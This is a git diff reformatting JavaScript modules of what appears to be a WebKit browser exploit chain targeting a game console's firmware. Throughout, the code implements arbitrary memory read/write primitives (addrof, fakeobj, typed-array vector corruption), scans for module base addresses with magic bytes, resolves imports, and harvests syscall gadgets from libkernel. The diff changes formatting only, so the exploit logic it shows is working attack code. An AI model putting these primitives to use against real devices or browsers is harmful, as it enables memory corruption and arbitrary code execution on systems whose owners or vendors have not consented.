- return new this.constructor(
- low >>> 0,
- ((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0,
- );
- }
-
- eq(b) {
- const values = lohi_from_one(b);
- const u32 = this._u32;
- return (
- u32[0] === values[0]
- && u32[1] === values[1]
- );
- }
-
- ne(b) {
- return !this.eq(b);
- }
-
- add(b) {
- const values = lohi_from_one(b);
- const u32 = this._u32;
- const low = u32[0] + values[0];
- return new this.constructor(
- low >>> 0,
- (u32[1] + values[1] + (low > 0xffffffff)) >>> 0,
- );
- }
-
- sub(b) {
- const values = lohi_from_one(b);
- const u32 = this._u32;
- const low = u32[0] + (~values[0] >>> 0) + 1;
- return new this.constructor(
- low >>> 0,
- (u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0,
- );
- }
-
- toString(is_pretty=false) {
- if (!is_pretty) {
- const low = this.lo.toString(16).padStart(8, '0');
- const high = this.hi.toString(16).padStart(8, '0');
- return '0x' + high + low;
- }
- let high = this.hi.toString(16).padStart(8, '0');
- high = high.substring(0, 4) + '_' + high.substring(4);
-
- let low = this.lo.toString(16).padStart(8, '0');
- low = low.substring(0, 4) + '_' + low.substring(4);
-
- return '0x' + high + '_' + low;
- }
+ return `0x${high}_${low}`;
+ }
}
diff --git a/src/module/mem.mjs b/src/module/mem.mjs
index 2620230..6bf4bb4 100644
--- a/src/module/mem.mjs
+++ b/src/module/mem.mjs
@@ -15,8 +15,8 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
-import { Int, lohi_from_one } from './int64.mjs';
-import { view_m_vector, view_m_length } from './offset.mjs';
+import { Int, lohi_from_one } from "./int64.mjs";
+import { view_m_vector, view_m_length } from "./offset.mjs";
export let mem = null;
@@ -26,128 +26,128 @@ const off_vector2 = (view_m_vector + 4) / 4;
const isInteger = Number.isInteger;
function init_module(memory) {
- mem = memory;
+ mem = memory;
}
function add_and_set_addr(mem, offset, base_lo, base_hi) {
- const values = lohi_from_one(offset);
- const main = mem._main;
+ const values = lohi_from_one(offset);
+ const main = mem._main;
- const low = base_lo + values[0];
+ const low = base_lo + values[0];
- // no need to use ">>> 0" to convert to unsigned here
- main[off_vector] = low;
- main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
+ // no need to use ">>> 0" to convert to unsigned here
+ main[off_vector] = low;
+ main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
}
export class Addr extends Int {
- read8(offset) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
-
- return m.read8_at(offset);
+ read8(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- read16(offset) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ return m.read8_at(offset);
+ }
- return m.read16_at(offset);
+ read16(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- read32(offset) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ return m.read16_at(offset);
+ }
- return m.read32_at(offset);
+ read32(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- read64(offset) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ return m.read32_at(offset);
+ }
- return m.read64_at(offset);
+ read64(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- readp(offset) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ return m.read64_at(offset);
+ }
- return m.readp_at(offset);
+ readp(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- write8(offset, value) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ return m.readp_at(offset);
+ }
- m.write8_at(offset, value);
+ write8(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- write16(offset, value) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ m.write8_at(offset, value);
+ }
- m.write16_at(offset, value);
+ write16(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- write32(offset, value) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ m.write16_at(offset, value);
+ }
- m.write32_at(offset, value);
+ write32(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
- write64(offset, value) {
- const m = mem;
- if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
- m._set_addr_direct(this);
- } else {
- add_and_set_addr(m, offset, this.lo, this.hi);
- offset = 0;
- }
+ m.write32_at(offset, value);
+ }
- m.write64_at(offset, value);
+ write64(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
}
+
+ m.write64_at(offset, value);
+ }
}
// expected:
@@ -167,264 +167,253 @@ export class Addr extends Int {
// the relative read/write methods expect the offset to be a unsigned 32-bit
// integer
export class Memory {
- constructor(main, worker, obj, addr_addr, fake_addr) {
- this._main = main;
- this._worker = worker;
- this._obj = obj;
- this._addr_low = addr_addr.lo;
- this._addr_high = addr_addr.hi;
- this._fake_low = fake_addr.lo;
- this._fake_high = fake_addr.hi;
+ constructor(main, worker, obj, addr_addr, fake_addr) {
+ this._main = main;
+ this._worker = worker;
+ this._obj = obj;
+ this._addr_low = addr_addr.lo;
+ this._addr_high = addr_addr.hi;
+ this._fake_low = fake_addr.lo;
+ this._fake_high = fake_addr.hi;
- main[view_m_length / 4] = 0xffffffff;
+ main[view_m_length / 4] = 0xffffffff;
- init_module(this);
+ init_module(this);
- const off_mvec = view_m_vector;
- // use this to create WastefulTypedArrays to avoid a GC crash
- const buf = new ArrayBuffer(0);
+ const off_mvec = view_m_vector;
+ // use this to create WastefulTypedArrays to avoid a GC crash
+ const buf = new ArrayBuffer(0);
- const src = new Uint8Array(buf);
- const sset = new Uint32Array(buf);
- const sset_p = this.addrof(sset);
- sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
- sset_p.write32(view_m_length, 3);
- this._cpysrc = src;
- this._src_setter = sset;
+ const src = new Uint8Array(buf);
+ const sset = new Uint32Array(buf);
+ const sset_p = this.addrof(sset);
+ sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
+ sset_p.write32(view_m_length, 3);
+ this._cpysrc = src;
+ this._src_setter = sset;
- const dst = new Uint8Array(buf);
- const dset = new Uint32Array(buf);
- const dset_p = this.addrof(dset);
- dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
- dset_p.write32(view_m_length, 3);
- dset[2] = 0xffffffff;
- this._cpydst = dst;
- this._dst_setter = dset;
+ const dst = new Uint8Array(buf);
+ const dset = new Uint32Array(buf);
+ const dset_p = this.addrof(dset);
+ dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
+ dset_p.write32(view_m_length, 3);
+ dset[2] = 0xffffffff;
+ this._cpydst = dst;
+ this._dst_setter = dset;
+ }
+
+ // dst and src may overlap
+ cpy(dst, src, len) {
+ if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
+ throw TypeError("len not a unsigned 32-bit integer");
}
- // dst and src may overlap
- cpy(dst, src, len) {
- if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
- throw TypeError('len not a unsigned 32-bit integer');
- }
+ const dvals = lohi_from_one(dst);
+ const svals = lohi_from_one(src);
+ const dset = this._dst_setter;
+ const sset = this._src_setter;
- const dvals = lohi_from_one(dst);
- const svals = lohi_from_one(src);
- const dset = this._dst_setter;
- const sset = this._src_setter;
+ dset[0] = dvals[0];
+ dset[1] = dvals[1];
+ sset[0] = svals[0];
+ sset[1] = svals[1];
+ sset[2] = len;
- dset[0] = dvals[0];
- dset[1] = dvals[1];
- sset[0] = svals[0];
- sset[1] = svals[1];
- sset[2] = len;
+ this._cpydst.set(this._cpysrc);
+ }
- this._cpydst.set(this._cpysrc);
+ // allocate Garbage Collector managed memory. returns [address_of_memory,
+ // backer]. backer is the JSCell that is keeping the returned memory alive,
+ // you can drop it once you have another GC object reference the address.
+ // the backer is an implementation detail. don't use it to mutate the
+ // memory
+ gc_alloc(size) {
+ if (!isInteger(size)) {
+ throw TypeError("size not a integer");
+ }
+ if (size < 0) {
+ throw RangeError("size is negative");
}
- // allocate Garbage Collector managed memory. returns [address_of_memory,
- // backer]. backer is the JSCell that is keeping the returned memory alive,
- // you can drop it once you have another GC object reference the address.
- // the backer is an implementation detail. don't use it to mutate the
- // memory
- gc_alloc(size) {
- if (!isInteger(size)) {
- throw TypeError('size not a integer');
- }
- if (size < 0) {
- throw RangeError('size is negative');
- }
-
- const fastLimit = 1000;
- size = (size + 7 & ~7) >> 3;
- if (size > fastLimit) {
- throw RangeError('size is too large');
- }
-
- const backer = new Float64Array(size);
- return [mem.addrof(backer).readp(view_m_vector), backer];
+ const fastLimit = 1000;
+ size = ((size + 7) & ~7) >> 3;
+ if (size > fastLimit) {
+ throw RangeError("size is too large");
}
- fakeobj(addr) {
- const values = lohi_from_one(addr);
- const worker = this._worker;
- const main = this._main;
+ const backer = new Float64Array(size);
+ return [mem.addrof(backer).readp(view_m_vector), backer];
+ }
- main[off_vector] = this._fake_low;
- main[off_vector2] = this._fake_high;
- worker.setUint32(0, values[0], true);
- worker.setUint32(4, values[1], true);
- return this._obj[0];
+ fakeobj(addr) {
+ const values = lohi_from_one(addr);
+ const worker = this._worker;
+ const main = this._main;
+
+ main[off_vector] = this._fake_low;
+ main[off_vector2] = this._fake_high;
+ worker.setUint32(0, values[0], true);
+ worker.setUint32(4, values[1], true);
+ return this._obj[0];
+ }
+
+ addrof(object) {
+ // typeof considers null as a object. blacklist it as it isn't a
+ // JSObject
+ if (object === null || (typeof object !== "object" && typeof object !== "function")) {
+ throw TypeError("argument not a JS object");
}
- addrof(object) {
- // typeof considers null as a object. blacklist it as it isn't a
- // JSObject
- if (object === null
- || (typeof object !== 'object' && typeof object !== 'function')
- ) {
- throw TypeError('argument not a JS object');
- }
+ const obj = this._obj;
+ const worker = this._worker;
+ const main = this._main;
- const obj = this._obj;
- const worker = this._worker;
- const main = this._main;
+ obj.addr = object;
- obj.addr = object;
+ main[off_vector] = this._addr_low;
+ main[off_vector2] = this._addr_high;
- main[off_vector] = this._addr_low;
- main[off_vector2] = this._addr_high;
+ const res = new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
+ obj.addr = null;
- const res = new Addr(
- worker.getUint32(0, true),
- worker.getUint32(4, true),
- );
- obj.addr = null;
+ return res;
+ }
- return res;
+ // expects addr to be a Int
+ _set_addr_direct(addr) {
+ const main = this._main;
+ main[off_vector] = addr.lo;
+ main[off_vector2] = addr.hi;
+ }
+
+ set_addr(addr) {
+ const values = lohi_from_one(addr);
+ const main = this._main;
+ main[off_vector] = values[0];
+ main[off_vector2] = values[1];
+ }
+
+ get_addr() {
+ const main = this._main;
+ return new Addr(main[off_vector], main[off_vector2]);
+ }
+
+ read8(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint8(0);
+ }
+
+ read16(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint16(0, true);
+ }
+
+ read32(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint32(0, true);
+ }
+
+ read64(addr) {
+ this.set_addr(addr);
+ const worker = this._worker;
+ return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
+ }
+
+ // returns a pointer instead of an Int
+ readp(addr) {
+ this.set_addr(addr);
+ const worker = this._worker;
+ return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
+ }
+
+ read8_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ return this._worker.getUint8(offset);
+ }
- // expects addr to be a Int
- _set_addr_direct(addr) {
- const main = this._main;
- main[off_vector] = addr.lo;
- main[off_vector2] = addr.hi;
+ read16_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ return this._worker.getUint16(offset, true);
+ }
- set_addr(addr) {
- const values = lohi_from_one(addr);
- const main = this._main;
- main[off_vector] = values[0];
- main[off_vector2] = values[1];
+ read32_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ return this._worker.getUint32(offset, true);
+ }
- get_addr() {
- const main = this._main;
- return new Addr(main[off_vector], main[off_vector2]);
+ read64_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ const worker = this._worker;
+ return new Int(worker.getUint32(offset, true), worker.getUint32(offset + 4, true));
+ }
- read8(addr) {
- this.set_addr(addr);
- return this._worker.getUint8(0);
+ readp_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ const worker = this._worker;
+ return new Addr(worker.getUint32(offset, true), worker.getUint32(offset + 4, true));
+ }
- read16(addr) {
- this.set_addr(addr);
- return this._worker.getUint16(0, true);
- }
+ write8(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint8(0, value);
+ }
- read32(addr) {
- this.set_addr(addr);
- return this._worker.getUint32(0, true);
- }
+ write16(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint16(0, value, true);
+ }
- read64(addr) {
- this.set_addr(addr);
- const worker = this._worker;
- return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
- }
+ write32(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint32(0, value, true);
+ }
- // returns a pointer instead of an Int
- readp(addr) {
- this.set_addr(addr);
- const worker = this._worker;
- return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
- }
+ write64(addr, value) {
+ const values = lohi_from_one(value);
+ this.set_addr(addr);
+ const worker = this._worker;
+ worker.setUint32(0, values[0], true);
+ worker.setUint32(4, values[1], true);
+ }
- read8_at(offset) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- return this._worker.getUint8(offset);
+ write8_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ this._worker.setUint8(offset, value);
+ }
- read16_at(offset) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- return this._worker.getUint16(offset, true);
+ write16_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ this._worker.setUint16(offset, value, true);
+ }
- read32_at(offset) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- return this._worker.getUint32(offset, true);
+ write32_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ this._worker.setUint32(offset, value, true);
+ }
- read64_at(offset) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- const worker = this._worker;
- return new Int(
- worker.getUint32(offset, true),
- worker.getUint32(offset + 4, true),
- );
- }
-
- readp_at(offset) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- const worker = this._worker;
- return new Addr(
- worker.getUint32(offset, true),
- worker.getUint32(offset + 4, true),
- );
- }
-
- write8(addr, value) {
- this.set_addr(addr);
- this._worker.setUint8(0, value);
- }
-
- write16(addr, value) {
- this.set_addr(addr);
- this._worker.setUint16(0, value, true);
- }
-
- write32(addr, value) {
- this.set_addr(addr);
- this._worker.setUint32(0, value, true);
- }
-
- write64(addr, value) {
- const values = lohi_from_one(value);
- this.set_addr(addr);
- const worker = this._worker;
- worker.setUint32(0, values[0], true);
- worker.setUint32(4, values[1], true);
- }
-
- write8_at(offset, value) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- this._worker.setUint8(offset, value);
- }
-
- write16_at(offset, value) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- this._worker.setUint16(offset, value, true);
- }
-
- write32_at(offset, value) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- this._worker.setUint32(offset, value, true);
- }
-
- write64_at(offset, value) {
- if (!isInteger(offset)) {
- throw TypeError('offset not a integer');
- }
- const values = lohi_from_one(value);
- const worker = this._worker;
- worker.setUint32(offset, values[0], true);
- worker.setUint32(offset + 4, values[1], true);
+ write64_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError("offset not a integer");
}
+ const values = lohi_from_one(value);
+ const worker = this._worker;
+ worker.setUint32(offset, values[0], true);
+ worker.setUint32(offset + 4, values[1], true);
+ }
}
diff --git a/src/module/memtools.mjs b/src/module/memtools.mjs
index 3445ad2..423cfca 100644
--- a/src/module/memtools.mjs
+++ b/src/module/memtools.mjs
@@ -17,98 +17,92 @@ along with this program. If not, see . */
// This module are for utilities that depend on running the exploit first
-import { Int } from './int64.mjs';
-import { mem } from './mem.mjs';
-import { align } from './utils.mjs';
-import { page_size } from './offset.mjs';
-import { BufferView } from './rw.mjs';
-import { View1 } from './view.mjs';
+import { Int } from "./int64.mjs";
+import { mem } from "./mem.mjs";
+import { align } from "./utils.mjs";
+import { page_size } from "./offset.mjs";
+import { BufferView } from "./rw.mjs";
+import { View1 } from "./view.mjs";
-import * as off from './offset.mjs';
+import * as off from "./offset.mjs";
// creates an ArrayBuffer whose contents is copied from addr
export function make_buffer(addr, size) {
- // see enum TypedArrayMode from
- // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h
- // at webkitgtk 2.34.4
- //
- // see possiblySharedBuffer() from
- // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
- // at webkitgtk 2.34.4
+ // see enum TypedArrayMode from
+ // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h
+ // at webkitgtk 2.34.4
+ //
+ // see possiblySharedBuffer() from
+ // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
+ // at webkitgtk 2.34.4
- // We will create an OversizeTypedArray via requesting an Uint8Array whose
- // number of elements will be greater than fastSizeLimit (1000).
- //
- // We will not use a FastTypedArray since its m_vector is visited by the
- // GC and we will temporarily change it. The GC expects addresses from the
- // JS heap, and that heap has metadata that the GC uses. The GC will likely
- // crash since valid metadata won't likely be found at arbitrary addresses.
- //
- // The FastTypedArray approach will have a small time frame where the GC
- // can inspect the invalid m_vector field.
- //
- // Views created via "new TypedArray(x)" where "x" is a number will always
- // have an m_mode < WastefulTypedArray.
- const u = new Uint8Array(1001);
- const u_addr = mem.addrof(u);
+ // We will create an OversizeTypedArray via requesting an Uint8Array whose
+ // number of elements will be greater than fastSizeLimit (1000).
+ //
+ // We will not use a FastTypedArray since its m_vector is visited by the
+ // GC and we will temporarily change it. The GC expects addresses from the
+ // JS heap, and that heap has metadata that the GC uses. The GC will likely
+ // crash since valid metadata won't likely be found at arbitrary addresses.
+ //
+ // The FastTypedArray approach will have a small time frame where the GC
+ // can inspect the invalid m_vector field.
+ //
+ // Views created via "new TypedArray(x)" where "x" is a number will always
+ // have an m_mode < WastefulTypedArray.
+ const u = new Uint8Array(1001);
+ const u_addr = mem.addrof(u);
- // we won't change the butterfly and m_mode so we won't save those
- const old_addr = u_addr.read64(off.view_m_vector);
- const old_size = u_addr.read32(off.view_m_length);
+ // we won't change the butterfly and m_mode so we won't save those
+ const old_addr = u_addr.read64(off.view_m_vector);
+ const old_size = u_addr.read32(off.view_m_length);
- u_addr.write64(off.view_m_vector, addr);
- u_addr.write32(off.view_m_length, size);
+ u_addr.write64(off.view_m_vector, addr);
+ u_addr.write32(off.view_m_length, size);
- const copy = new Uint8Array(u.length);
- copy.set(u);
+ const copy = new Uint8Array(u.length);
+ copy.set(u);
- // Views with m_mode < WastefulTypedArray don't have an ArrayBuffer object
- // associated with them, if we ask for view.buffer, the view will be
- // converted into a WastefulTypedArray and an ArrayBuffer will be created.
- // This is done by calling slowDownAndWasteMemory().
- //
- // We can't use slowDownAndWasteMemory() on u since that will create a
- // JSC::ArrayBufferContents with its m_data pointing to addr. On the
- // ArrayBuffer's death, it will call WTF::fastFree() on m_data. This can
- // cause a crash if the m_data is not from the fastMalloc heap, and even if
- // it is, freeing abitrary addresses is dangerous as it may lead to a
- // use-after-free.
- const res = copy.buffer;
+ // Views with m_mode < WastefulTypedArray don't have an ArrayBuffer object
+ // associated with them, if we ask for view.buffer, the view will be
+ // converted into a WastefulTypedArray and an ArrayBuffer will be created.
+ // This is done by calling slowDownAndWasteMemory().
+ //
+ // We can't use slowDownAndWasteMemory() on u since that will create a
+ // JSC::ArrayBufferContents with its m_data pointing to addr. On the
+ // ArrayBuffer's death, it will call WTF::fastFree() on m_data. This can
+ // cause a crash if the m_data is not from the fastMalloc heap, and even if
+ // it is, freeing abitrary addresses is dangerous as it may lead to a
+ // use-after-free.
+ const res = copy.buffer;
- // restore
- u_addr.write64(off.view_m_vector, old_addr);
- u_addr.write32(off.view_m_length, old_size);
+ // restore
+ u_addr.write64(off.view_m_vector, old_addr);
+ u_addr.write32(off.view_m_length, old_size);
- return res;
+ return res;
}
// these values came from analyzing dumps from CelesteBlue
function check_magic_at(p, is_text) {
- // byte sequence that is very likely to appear at offset 0 of a .text
- // segment
- const text_magic = [
- new Int(0xe5894855, 0x56415741),
- new Int(0x54415541, 0x8d485053),
- ];
+ // byte sequence that is very likely to appear at offset 0 of a .text
+ // segment
+ const text_magic = [new Int(0xe5894855, 0x56415741), new Int(0x54415541, 0x8d485053)];
- // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
+ // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
- // .data magic from 3.00, 6.00, and 6.20
- //const data_magic = [
- // new Int(0x18),
- // new Int(0x3c13f4bf, 0x1),
- //];
+ // .data magic from 3.00, 6.00, and 6.20
+ //const data_magic = [
+ // new Int(0x18),
+ // new Int(0x3c13f4bf, 0x1),
+ //];
- // .data magic from 8.00 and 8.03
- const data_magic = [
- new Int(0x20),
- new Int(0x3c13f4bf, 0x2),
- ];
+ // .data magic from 8.00 and 8.03
+ const data_magic = [new Int(0x20), new Int(0x3c13f4bf, 0x2)];
- const magic = is_text ? text_magic : data_magic;
- const value = [p.read64(0), p.read64(8)];
+ const magic = is_text ? text_magic : data_magic;
+ const value = [p.read64(0), p.read64(8)];
- return value[0].eq(magic[0]) && value[1].eq(magic[1]);
+ return value[0].eq(magic[0]) && value[1].eq(magic[1]);
}
// Finds the base address of a segment: .text or .data
@@ -137,120 +131,96 @@ function check_magic_at(p, is_text) {
// addr.read8(-1);
//
export function find_base(addr, is_text, is_back) {
- // align to page size
- addr = align(addr, page_size);
- const offset = (is_back ? -1 : 1) * page_size;
- while (true) {
- if (check_magic_at(addr, is_text)) {
- break;
- }
- addr = addr.add(offset);
+ // align to page size
+ addr = align(addr, page_size);
+ const offset = (is_back ? -1 : 1) * page_size;
+ while (true) {
+ if (check_magic_at(addr, is_text)) {
+ break;
}
- return addr;
+ addr = addr.add(offset);
+ }
+ return addr;
}
// gets the address of the underlying buffer of a JSC::JSArrayBufferView
export function get_view_vector(view) {
- if (!ArrayBuffer.isView(view)) {
- throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
- }
- return mem.addrof(view).readp(off.view_m_vector);
+ if (!ArrayBuffer.isView(view)) {
+ throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
+ }
+ return mem.addrof(view).readp(off.view_m_vector);
}
export function resolve_import(import_addr) {
- if (import_addr.read16(0) !== 0x25ff) {
- throw Error(
- `instruction at ${import_addr} is not of the form: jmp qword`
- + ' [rip + X]');
- }
- // module_function_import:
- // jmp qword [rip + X]
- // ff 25 xx xx xx xx // signed 32-bit displacement
- const disp = import_addr.read32(2);
- // assume disp and offset are 32-bit integers
- // x | 0 will always be a signed integer
- const offset = (disp | 0) + 6;
- // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
- // of the next instruction. This means that the actual address used is
- // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
- // jump instruction, which is 6 in this case.
- const function_addr = import_addr.readp(offset);
+ if (import_addr.read16(0) !== 0x25ff) {
+ throw Error(`instruction at ${import_addr} is not of the form: jmp qword [rip + X]`);
+ }
+ // module_function_import:
+ // jmp qword [rip + X]
+ // ff 25 xx xx xx xx // signed 32-bit displacement
+ const disp = import_addr.read32(2);
+ // assume disp and offset are 32-bit integers
+ // x | 0 will always be a signed integer
+ const offset = (disp | 0) + 6;
+ // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
+ // of the next instruction. This means that the actual address used is
+ // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
+ // jump instruction, which is 6 in this case.
+ const function_addr = import_addr.readp(offset);
- return function_addr;
+ return function_addr;
}
-export function init_syscall_array(
- syscall_array,
- libkernel_web_base,
- max_search_size,
-) {
- if (!Number.isInteger(max_search_size)) {
- throw TypeError(
- `max_search_size is not a integer: ${max_search_size}`);
- }
- if (max_search_size < 0) {
- throw Error(`max_search_size is less than 0: ${max_search_size}`);
- }
+export function init_syscall_array(syscall_array, libkernel_web_base, max_search_size) {
+ if (!Number.isInteger(max_search_size)) {
+ throw TypeError(`max_search_size is not a integer: ${max_search_size}`);
+ }
+ if (max_search_size < 0) {
+ throw Error(`max_search_size is less than 0: ${max_search_size}`);
+ }
- const libkernel_web_buffer = make_buffer(
- libkernel_web_base,
- max_search_size,
- );
- const kbuf = new BufferView(libkernel_web_buffer);
+ const libkernel_web_buffer = make_buffer(libkernel_web_base, max_search_size);
+ const kbuf = new BufferView(libkernel_web_buffer);
- // Search 'rdlo' string from libkernel_web's .rodata section to gain an
- // upper bound on the size of the .text section.
- let text_size = 0;
- let found = false;
- for (let i = 0; i < max_search_size; i++) {
- if (kbuf[i] === 0x72
- && kbuf[i + 1] === 0x64
- && kbuf[i + 2] === 0x6c
- && kbuf[i + 3] === 0x6f
- ) {
- text_size = i;
- found = true;
- break;
- }
- }
- if (!found) {
- throw Error(
- '"rdlo" string not found in libkernel_web, base address:'
- + ` ${libkernel_web_base}`);
+ // Search 'rdlo' string from libkernel_web's .rodata section to gain an
+ // upper bound on the size of the .text section.
+ let text_size = 0;
+ let found = false;
+ for (let i = 0; i < max_search_size; i++) {
+ if (kbuf[i] === 0x72 && kbuf[i + 1] === 0x64 && kbuf[i + 2] === 0x6c && kbuf[i + 3] === 0x6f) {
+ text_size = i;
+ found = true;
+ break;
}
+ }
+ if (!found) {
+ throw Error(`"rdlo" string not found in libkernel_web, base address: ${libkernel_web_base}`);
+ }
- // search for the instruction sequence:
- // syscall_X:
- // mov rax, X
- // mov r10, rcx
- // syscall
- for (let i = 0; i < text_size; i++) {
- if (kbuf[i] === 0x48
- && kbuf[i + 1] === 0xc7
- && kbuf[i + 2] === 0xc0
- && kbuf[i + 7] === 0x49
- && kbuf[i + 8] === 0x89
- && kbuf[i + 9] === 0xca
- && kbuf[i + 10] === 0x0f
- && kbuf[i + 11] === 0x05
- ) {
- const syscall_num = kbuf.read32(i + 3);
- syscall_array[syscall_num] = libkernel_web_base.add(i);
- // skip the sequence
- i += 11;
- }
+ // search for the instruction sequence:
+ // syscall_X:
+ // mov rax, X
+ // mov r10, rcx
+ // syscall
+ for (let i = 0; i < text_size; i++) {
+ if (kbuf[i] === 0x48 && kbuf[i + 1] === 0xc7 && kbuf[i + 2] === 0xc0 && kbuf[i + 7] === 0x49 && kbuf[i + 8] === 0x89 && kbuf[i + 9] === 0xca && kbuf[i + 10] === 0x0f && kbuf[i + 11] === 0x05) {
+ const syscall_num = kbuf.read32(i + 3);
+ syscall_array[syscall_num] = libkernel_web_base.add(i);
+ // skip the sequence
+ i += 11;
}
+ }
}
// create a char array like in the C language
//
// string to view since it's easier to get the address of the buffer this way
export function cstr(str) {
- str += '\0';
- return View1.from(str, c => c.codePointAt(0));
+ str += "\0";
+ return View1.from(str, (c) => c.codePointAt(0));
}
// we are re-exporting this since users that want to use cstr() usually want
